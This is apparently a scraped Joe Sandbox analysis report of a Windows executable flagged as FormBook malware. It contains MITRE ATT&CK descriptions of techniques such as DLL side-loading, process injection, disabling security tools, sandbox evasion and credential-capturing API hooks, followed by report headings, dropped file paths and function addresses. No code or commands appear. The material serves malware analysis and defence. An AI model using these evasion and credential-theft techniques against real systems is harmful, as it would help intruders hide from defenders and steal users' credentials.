Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report z2______________________________.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z2______________________________.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njr35n0a.uec.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_of4w4113.tma.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtpihgp4.fq0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycfrse5d.cvs.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
z2______________________________.exe

Function 0084E758 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 04C43304 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 04C43310 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 0084590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Function 04C417D4 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 008444B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 0084E9A0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON